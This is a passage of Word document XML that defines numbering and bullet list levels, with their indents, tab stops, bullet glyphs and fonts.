        <w:ind w:left="5120" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5840"/>
        </w:tabs>
        <w:ind w:left="5840" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="6560"/>
        </w:tabs>
        <w:ind w:left="6560" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="7280"/>
        </w:tabs>
        <w:ind w:left="7280" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0000001A"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0000001A"/>
    <w:name w:val="WW8Num25"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1680"/>
        </w:tabs>
        <w:ind w:left="1680" w:hanging="420"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000048"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00000048"/>
    <w:name w:val="WW8Num72"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1444"/>
        </w:tabs>
        <w:ind w:left="1444" w:hanging="284"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2240"/>
        </w:tabs>
        <w:ind w:left="2240" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2960"/>
        </w:tabs>
        <w:ind w:left="2960" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3680"/>
        </w:tabs>
        <w:ind w:left="3680" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="−"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4380"/>
        </w:tabs>
        <w:ind w:left="4380" w:hanging="340"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5120"/>
        </w:tabs>
        <w:ind w:left="5120" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5840"/>
        </w:tabs>
        <w:ind w:left="5840" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="6560"/>
        </w:tabs>
        <w:ind w:left="6560" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="7280"/>
        </w:tabs>
        <w:ind w:left="7280" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0000004B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0000004B"/>
    <w:name w:val="WW8Num75"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3254"/>
        </w:tabs>
        <w:ind w:left="3254" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2520"/>
        </w:tabs>
        <w:ind w:left="2520" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Times New Roman"/>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cs="Times New Roman"/>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cs="Times New Roman"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="7560"/>
        </w:tabs>
        <w:ind w:left="7560" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0000004C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0000004C"/>
    <w:name w:val="WW8Num76"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3153"/>
        </w:tabs>
        <w:ind w:left="3153" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2433"/>
        </w:tabs>
        <w:ind w:left="2433" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Times New Roman"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3153"/>
        </w:tabs>
        <w:ind w:left="3153" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3873"/>
        </w:tabs>
        <w:ind w:left="3873" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4593"/>
        </w:tabs>
        <w:ind w:left="4593" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Times New Roman"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5313"/>
        </w:tabs>
        <w:ind w:left="5313" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="6033"/>
        </w:tabs>
        <w:ind w:left="6033" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="6753"/>
        </w:tabs>
        <w:ind w:left="6753" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Times New Roman"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="7473"/>
        </w:tabs>
        <w:ind w:left="7473" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000050"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="00000050"/>
    <w:name w:val="WW8Num80"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1800"/>
        </w:tabs>
        <w:ind w:left="1800" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000052"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00000052"/>
    <w:name w:val="WW8Num82"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="216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53"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="00000053"/>
    <w:name w:val="WW8Num83"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000055"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00000055"/>
    <w:name w:val="WW8Num85"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="◊"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4380"/>
        </w:tabs>
        <w:ind w:left="4380" w:hanging="340"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:color w:val="auto"/>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12" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000058"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="00000058"/>
    <w:name w:val="WW8Num88"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0000005B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0000005B"/>
    <w:name w:val="WW8Num91"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3240"/>
        </w:tabs>
        <w:ind w:left="3240" w:hanging="374"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2520"/>
        </w:tabs>
        <w:ind w:left="2520" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3254"/>
        </w:tabs>
        <w:ind w:left="3254" w:hanging="374"/>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cs="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cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="7560"/>
        </w:tabs>
        <w:ind w:left="7560" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0000005D"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0000005D"/>
    <w:name w:val="WW8Num93"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00DD5FD6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00DD5FD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32B4131"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="032B4131"/>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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="034B741D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="034B741D"/>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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0B7E0643"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0B7E064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0CD045F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0CD045F3"/>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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="10763D9E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="10763D9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39979BF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="139979B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45B0A4F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="145B0A4F"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="-6-"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="227" w:hanging="227"/>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8024D03"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="18024D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36049C7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="236049C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3D84588"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="23D84588"/>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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="26E83DF1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="26E83DF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B4F764C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3B4F764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BD4044C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3BD4044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3BEB6FC6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3BEB6FC6"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:b w:val="0"/>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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3D8D0BCE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3D8D0BCE"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="1"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
        <w:b w:val="0"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="2"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="576" w:hanging="576"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
        <w:b w:val="0"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="3"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1571" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:caps w:val="0"/>
        <w:smallCaps w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:vanish w:val="0"/>
        <w:color w:val="000000"/>
        <w:spacing w:val="0"/>
        <w:position w:val="0"/>
        <w:u w:val="none"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="4"/>
      <w:lvlText w:val="%1.%2.%3.%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="864" w:hanging="864"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:b w:val="0"/>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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="406B7FE8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="406B7FE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6446A78"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="46446A7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C05332E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4C05332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501459AD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="501459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A2910B2"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5A2910B2"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>
        <w:ind w:left="425" w:hanging="425"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="36" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5A291387"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5A291387"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>
        <w:ind w:left="425" w:hanging="425"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="37" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5A2DFB83"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5A2DFB83"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>
        <w:ind w:left="425" w:hanging="425"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="38" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5A2E004A"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5A2E004A"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>
        <w:ind w:left="425" w:hanging="425"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="39" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5A7174E5"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5A7174E5"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
        </w:tabs>
        <w:ind w:left="420" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="40" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5A717A50"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5A717A50"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
        </w:tabs>
        <w:ind w:left="420" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="41" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5B5355F5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5B5355F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D166834"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5D1668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E5A670A"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5E5A670A"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="44" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5E826B4E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E8D829D0"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="-1"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>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
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="567" w:hanging="567"/>
      </w:pPr>
